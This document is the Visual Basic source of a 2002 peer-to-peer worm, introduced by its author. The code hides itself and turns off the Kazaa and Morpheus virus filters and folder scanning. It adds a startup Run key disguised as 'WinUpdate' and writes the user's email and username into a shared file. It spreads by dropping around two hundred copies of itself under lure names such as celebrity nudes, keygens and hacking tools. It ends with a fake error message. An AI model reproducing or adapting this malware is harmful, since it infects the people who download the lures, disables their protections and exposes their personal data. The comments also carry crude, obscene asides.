' KaZaa-Morpheus WoRm by KaGra ' ' Ok,here is a worm that replicates with Kazaa and Morpheus p2p network programs.The ' generall idea for almost ANY kind of such share programs to be used by a worm is this: ' You first change the settings that concern Shared Folders,virus protection,and generally ' any option that can be checked and unchecked in the "options menu" of the program.Then ' you try to find which values of the registry are affected (altered) by those ' changes.The next and final step to follow is to make those changes automatically ' by using a prog language.So,changing appropriate Windows registry values is the only ' thing to be done,to make a worm replicate via those share network progies.The next source ' code is a worm that does the following: ' First it checks 2 registry values to see if Morpheus or Kazaa is installed on the victim's PC. ' Then,if any prog is not found,it just pops up a message and exits.If a prog is found,worm ' creates a Folder by the name "Shared Files" and puts there several copies of it,with many ' names.Then,it makes this Folder shared for other people to download from Kazaa and ' Morpheus.Worm also disables all virus scanning options in Kazaa and Morpheus.It also ' adds a registry value,so that it runs immedialtely after the PC's boot sequence.If one of those ' 2 progs does not exist,all the things I've said happen for the other prog that exists (eg if Morpheus exists ' and Kazaa does not,worm infects Morpheus etc.). ' Those techniques used here can be used also for other Kazaa-Morpheus-like progs,like ' Gnutella etc. ,as far as you can find and change the proper registry values. ' The following code,now,12/11/2002 is made by me as a product of a little searching.I've ' not seen so far any detailed infection using those progs.As u 'll see it is not that hard... ' ' ' Some more words to say--->> This prog dedicated to : GeorGia,Politikus Mixannikus ' kai Ilektrologus Patras,Resident Evil,Aphex Twin,Marihuana,Alcopaul and a Girl from ' Portugal....Now let's GeT StOnEd WiTh The SourCe CoDe ^^^^^^^^Xeretismus sto Theo@ ' ' - Mumie,mumie, here is DooM Coming AgAin.....I wanna fuck U till Death.... ' -Worm Revolution Should have come...Something went wRong....HMMMMMMmmmmm.... ' -Etsi ,gia na GustarEI i PaRea^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ' ' ' ' Private Sub Form_Load() On Error Resume Next Form1.Visible = False Set fso = CreateObject("scripting.filesystemobject") Set wshshell = CreateObject("WScript.Shell") myname = App.Path & "\" & App.EXEName & ".exe" kazaa = 1 morf = 1 If wshshell.regread("HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DownloadDir") = "" Then kazaa = 0 End If If wshshell.regread("HKEY_USERS\.DEFAULT\SOFTWARE\Morpheus\LocalContent\DownloadDir") = "" Then morf = 0 End If Set winfold = fso.getspecialfolder(0) winfold2 = Right(winfold, Len(winfold) - 3) sysfold = winfold & "\SYSTEM\Shared Files" sysfold2 = "\SYSTEM" thirdfold = "\Shared Files" driv = Left(winfold, 3) If kazaa = 1 Then wshshell.regwrite "HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DisableSharing", 0, "REG_DWORD" wshshell.regwrite "HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DownloadDir", "C:\\Program Files\\KaZaA\\My Shared Folder", "REG_SZ" wshshell.regwrite "HKEY_CURRENT_USER\Software\Kazaa\LocalContent\Dir0", "012345:" & driv & "\" & winfold2 & "\" & sysfold2 & "\" & thirdfold, "REG_SZ" wshshell.regwrite "HKEY_CURRENT_USER\Software\Kazaa\ResultsFilter\virus_filter", 0, "REG_DWORD" wshshell.regwrite "HKEY_CURRENT_USER\Software\Kazaa\ResultsFilter\bogus_filter", 0, "REG_DWORD" wshshell.regwrite "HKEY_CURRENT_USER\Software\Kazaa\ResultsFilter\firewall_filter", 0, "REG_DWORD" wshshell.regwrite "HKEY_CURRENT_USER\Software\Kazaa\Advanced\ScanFolder", 0, "REG_DWORD" wshshell.regwrite "HKEY_CURRENT_USER\Software\Kazaa\UserDetails\AutoConnected", 1, "REG_DWORD" End If If morf = 1 Then wshshell.regwrite "HKEY_USERS\.DEFAULT\SOFTWARE\Morpheus\LocalContent\DisableSharing", 0, "REG_DWORD" wshshell.regwrite "HKEY_USERS\.DEFAULT\SOFTWARE\Morpheus\LocalContent\DownloadDir", "C:\\Program Files\\KaZaA\\My Shared Folder", "REG_SZ" wshshell.regwrite "HKEY_USERS\.DEFAULT\SOFTWARE\Morpheus\LocalContent\Dir0", "012345:" & driv & "\" & winfold2 & "\" & sysfold2 & "\" & thirdfold, "REG_SZ" wshshell.regwrite "HKEY_USERS\.DEFAULT\SOFTWARE\Morpheus\ResultsFilter\virus_filter", 0, "REG_DWORD" wshshell.regwrite "HKEY_USERS\.DEFAULT\SOFTWARE\Morpheus\ResultsFilter\bogus_filter", 0, "REG_DWORD" wshshell.regwrite "HKEY_USERS\.DEFAULT\SOFTWARE\Morpheus\ResultsFilter\firewall_filter", 0, "REG_DWORD" wshshell.regwrite "HKEY_USERS\.DEFAULT\SOFTWARE\Morpheus\UserDetails\AutoConnected", 0, "REG_DWORD" End If Set nfold = fso.CreateFolder(sysfold) If Err.Number = 58 Then If App.EXEName <> "WIN32SYSTEM" Then MsgBox myname & " is not a valid Win32 application.", 16, myname End If End End If thisfil = winfold & "\Win32system.exe" FileCopy myname, thisfil wshshell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", thisfil mail = wshshell.regread("HKEY_CURRENT_USER\Software\Kazaa\UserDetails\Email") user = wshshell.regread("HKEY_CURRENT_USER\Software\Kazaa\UserDetails\UserName") Set n = fso.createtextfile(nfold & "\kagra.jpg") n.writeline mail n.writeline user n.Close FileCopy myname, nfold & "\Alicia Silverstone Payboy Nude.exe " FileCopy myname, nfold & "\Britney Spears Dance Beat.exe " FileCopy myname, nfold & "\Free Mpegs.exe " FileCopy myname, nfold & "\Irc Client.exe " FileCopy myname, nfold & "\Shakira Dancing.exe " FileCopy myname, nfold & "\Soldier Of Fortune 2 Mutiplayer Serial Hack.exe " FileCopy myname, nfold & "\Kama Sutra.exe " FileCopy myname, nfold & "\Iron-Maiden.exe " FileCopy myname, nfold & "\ain't it funny.exe " FileCopy myname, nfold & "\bye bye bye.exe " FileCopy myname, nfold & "\dracule.exe " FileCopy myname, nfold & "\fake.exe " FileCopy myname, nfold & "\get the party started.exe " FileCopy myname, nfold & "\hey baby.exe " FileCopy myname, nfold & "\Portishead.exe " FileCopy myname, nfold & "\Angeline.exe " FileCopy myname, nfold & "\Madonna.exe " FileCopy myname, nfold & "\Ricky Martin's body.exe " FileCopy myname, nfold & "\Jennifer Lopez body.exe " FileCopy myname, nfold & "\Eminem gun.exe " FileCopy myname, nfold & "\Backstreet Boys.exe " FileCopy myname, nfold & "\Pink.exe " FileCopy myname, nfold & "\Destiny's Child.exe " FileCopy myname, nfold & "\Alicia Keys.exe " FileCopy myname, nfold & "\Dido.exe " FileCopy myname, nfold & "\Sting.exe " FileCopy myname, nfold & "\Michael Jackson.exe " FileCopy myname, nfold & "\Matrix.exe " FileCopy myname, nfold & "\Lord of the Rings.exe " FileCopy myname, nfold & "\Harry Poter.exe " FileCopy myname, nfold & "\Spider.exe " FileCopy myname, nfold & "\Death.exe " FileCopy myname, nfold & "\Kill.exe " FileCopy myname, nfold & "\God.exe " FileCopy myname, nfold & "\XXX.exe " FileCopy myname, nfold & "\Money.exe " FileCopy myname, nfold & "\Love.exe " FileCopy myname, nfold & "\Kiss.exe " FileCopy myname, nfold & "\mp3.exe " FileCopy myname, nfold & "\avi.exe " FileCopy myname, nfold & "\mpeg.exe " FileCopy myname, nfold & "\jpg.exe " FileCopy myname, nfold & "\jpeg.exe " FileCopy myname, nfold & "\bat.exe " FileCopy myname, nfold & "\Dream.exe " FileCopy myname, nfold & "\Nirvana.exe " FileCopy myname, nfold & "\Suicide.exe " FileCopy myname, nfold & "\Exe.exe " FileCopy myname, nfold & "\Pack.exe " FileCopy myname, nfold & "\Sleep.exe " FileCopy myname, nfold & "\Metal.exe " FileCopy myname, nfold & "\Pop.exe " FileCopy myname, nfold & "\Rock.exe " FileCopy myname, nfold & "\Mozart.exe " FileCopy myname, nfold & "\Classic.exe " FileCopy myname, nfold & "\Music.exe " FileCopy myname, nfold & "\Bach.exe " FileCopy myname, nfold & "\Requiem.exe " FileCopy myname, nfold & "\Vimpire.exe " FileCopy myname, nfold & "\Beethoven.exe " FileCopy myname, nfold & "\Dance.exe " FileCopy myname, nfold & "\Beat.exe " FileCopy myname, nfold & "\Peace.exe " FileCopy myname, nfold & "\War.exe " FileCopy myname, nfold & "\Pray.exe " FileCopy myname, nfold & "\Stone.exe " FileCopy myname, nfold & "\Smoke.exe " FileCopy myname, nfold & "\Fire.exe " FileCopy myname, nfold & "\Load.exe " FileCopy myname, nfold & "\Collection.exe " FileCopy myname, nfold & "\Best.exe " FileCopy myname, nfold & "\Best of.exe " FileCopy myname, nfold & "\Sound.exe " FileCopy myname, nfold & "\Cinema.exe " FileCopy myname, nfold & "\Soundtrack.exe " FileCopy myname, nfold & "\Spiderman.exe " FileCopy myname, nfold & "\Superman.exe " FileCopy myname, nfold & "\Title.exe " FileCopy myname, nfold & "\Tsalikis.exe " FileCopy myname, nfold & "\Greek.exe " FileCopy myname, nfold & "\Mama.exe " FileCopy myname, nfold & "\James Bond.exe " FileCopy myname, nfold & "\Band.exe " FileCopy myname, nfold & "\Star.exe " FileCopy myname, nfold & "\Julia Roberts.exe " FileCopy myname, nfold & "\Spielberg.exe " FileCopy myname, nfold & "\Tom Cruise.exe " FileCopy myname, nfold & "\Brad Pitt.exe " FileCopy myname, nfold & "\Robert Redford.exe " FileCopy myname, nfold & "\Michael.exe " FileCopy myname, nfold & "\Art.exe " FileCopy myname, nfold & "\John.exe " FileCopy myname, nfold & "\Doom patch.exe " FileCopy myname, nfold & "\Quake.exe " FileCopy myname, nfold & "\Wolfenstein.exe " FileCopy myname, nfold & "\3-d.exe " FileCopy myname, nfold & "\Driver.exe " FileCopy myname, nfold & "\crack.exe " FileCopy myname, nfold & "\hack.exe " FileCopy myname, nfold & "\Join.exe " FileCopy myname, nfold & "\Mail.exe " FileCopy myname, nfold & "\Hell on earth.exe " FileCopy myname, nfold & "\Movie.exe " FileCopy myname, nfold & "\Brad Pitt body.exe " FileCopy myname, nfold & "\!!!.exe " FileCopy myname, nfold & "\exe.exe " FileCopy myname, nfold & "\dll.exe " FileCopy myname, nfold & "\666.exe " FileCopy myname, nfold & "\Satan.exe " FileCopy myname, nfold & "\Rotting Christ.exe " FileCopy myname, nfold & "\U2.exe " FileCopy myname, nfold & "\MTV live.exe " FileCopy myname, nfold & "\Gathering.exe " FileCopy myname, nfold & "\Anneke girl.exe " FileCopy myname, nfold & "\Supermodels.exe " FileCopy myname, nfold & "\AdvZip Recovery.exe" FileCopy myname, nfold & "\AIM Pass stealer.exe" FileCopy myname, nfold & "\aimcracker.exe" FileCopy myname, nfold & "\aimhacker.exe" FileCopy myname, nfold & "\AMI BIOS Cracker.exe" FileCopy myname, nfold & "\anastasia_anal.exe" FileCopy myname, nfold & "\anastasia_naked.exe" FileCopy myname, nfold & "\anastasia_nude.exe" FileCopy myname, nfold & "\Autocad 2002 Crack.exe" FileCopy myname, nfold & "\buttman.exe" FileCopy myname, nfold & "\catherine_zeta_jones_anal.exe" FileCopy myname, nfold & "\catherine_zeta_jones_naked.exe" FileCopy myname, nfold & "\catherine_zeta_jones_nude.exe" FileCopy myname, nfold & "\Counter Strike_CD_Keygen.exe" FileCopy myname, nfold & "\Delphi 5 Keygen.exe" FileCopy myname, nfold & "\Delphi 6 Keygen.exe" FileCopy myname, nfold & "\Digimon.exe" FileCopy myname, nfold & "\divx_fix.exe" FileCopy myname, nfold & "\divx_repair.exe" FileCopy myname, nfold & "\edonkey_serverlist.exe" FileCopy myname, nfold & "\ftp_cracker.exe" FileCopy myname, nfold & "\ftp_hacker.exe" FileCopy myname, nfold & "\Half_life Cd keygen.exe" FileCopy myname, nfold & "\host_faker.exe" FileCopy myname, nfold & "\host_spoofer.exe" FileCopy myname, nfold & "\Hotmail Hacker.exe" FileCopy myname, nfold & "\hotmail_account_sniffer.exe" FileCopy myname, nfold & "\hotmailcracker.exe" FileCopy myname, nfold & "\hotmailhacker.exe" FileCopy myname, nfold & "\ICQ_Hackingtools.exe" FileCopy myname, nfold & "\icqcracker.exe" FileCopy myname, nfold & "\icqhacker.exe" FileCopy myname, nfold & "\ident_faker.exe" FileCopy myname, nfold & "\ident_spoofer.exe" FileCopy myname, nfold & "\IIS_shellbind_exploit.exe" FileCopy myname, nfold & "\invisible_IP.exe" FileCopy myname, nfold & "\ip_faker.exe" FileCopy myname, nfold & "\ip_spoofer.exe" FileCopy myname, nfold & "\kazaa.exe" FileCopy myname, nfold & "\kmd151_en.exe" FileCopy myname, nfold & "\linux_root.exe" FileCopy myname, nfold & "\Linux_rootaccess.exe" FileCopy myname, nfold & "\msn_IP_finder.exe" FileCopy myname, nfold & "\msncracker.exe" FileCopy myname, nfold & "\msnhacker.exe" FileCopy myname, nfold & "\Office key Gen.exe" FileCopy myname, nfold & "\Office XP Crack.exe" FileCopy myname, nfold & "\OfficeXP_Keygen.exe" FileCopy myname, nfold & "\pamela_anderson_anal.exe" FileCopy myname, nfold & "\pamela_anderson_naked.exe" FileCopy myname, nfold & "\pamela_anderson_nude.exe" FileCopy myname, nfold & "\Pokemon.exe" FileCopy myname, nfold & "\porn_account_cracker.exe" FileCopy myname, nfold & "\porn_account_hacker.exe" FileCopy myname, nfold & "\PS1 BootCD.exe" FileCopy myname, nfold & "\PS2 BootCD.exe" FileCopy myname, nfold & "\PS2_emulator_bleem.exe" FileCopy myname, nfold & "\sandra_bullock_naked.exe" FileCopy myname, nfold & "\sandra_bullock_nude.exe" FileCopy myname, nfold & "\sarah_michelle_gellar_naked.exe" FileCopy myname, nfold & "\sarah_michelle_gellar_nude.exe" FileCopy myname, nfold & "\shakira_anal.exe" FileCopy myname, nfold & "\shakira_a -sf - -ked.exe" FileCopy myname, nfold & "\shakira_naked.exe" FileCopy myname, nfold & "\shakira_nude.exe" FileCopy myname, nfold & "\shakira_paparazzi_collection.exe" FileCopy myname, nfold & "\Sub7_masterpwd.exe" FileCopy myname, nfold & "\tripod_cracker.exe" FileCopy myname, nfold & "\tripod_hacker.exe" FileCopy myname, nfold & "\win2k_pass_decryptor.exe" FileCopy myname, nfold & "\Win2k_reboot_exploit.exe" FileCopy myname, nfold & "\win2k_serial.exe" FileCopy myname, nfold & "\Windows_Keygen_allver.exe" FileCopy myname, nfold & "\winxp_crack.exe" FileCopy myname, nfold & "\winxp_cracker.exe" FileCopy myname, nfold & "\winxp_hacker.exe" FileCopy myname, nfold & "\WinXP_Keygen.exe" FileCopy myname, nfold & "\winxphack.exe" FileCopy myname, nfold & "\Winzip_Pass_Cracker.exe" FileCopy myname, nfold & "\Word_Pass_Cracker.exe" FileCopy myname, nfold & "\xbox_emulator_beta.exe" FileCopy myname, nfold & "\XP DVD Plugin.exe" FileCopy myname, nfold & "\XP ScreenSaver.exe" FileCopy myname, nfold & "\XP_Box_emulator.exe" FileCopy myname, nfold & "\XP_keygen.exe" FileCopy myname, nfold & "\yahoo_cracker.exe" FileCopy myname, nfold & "\yahoo_hacker.exe" FileCopy myname, nfold & "\Yahoo_mail_cracker.exe" If App.EXEName <> "WIN32SYSTEM" Then MsgBox myname & " is not a valid Win32 application.", 16, myname End If End End Sub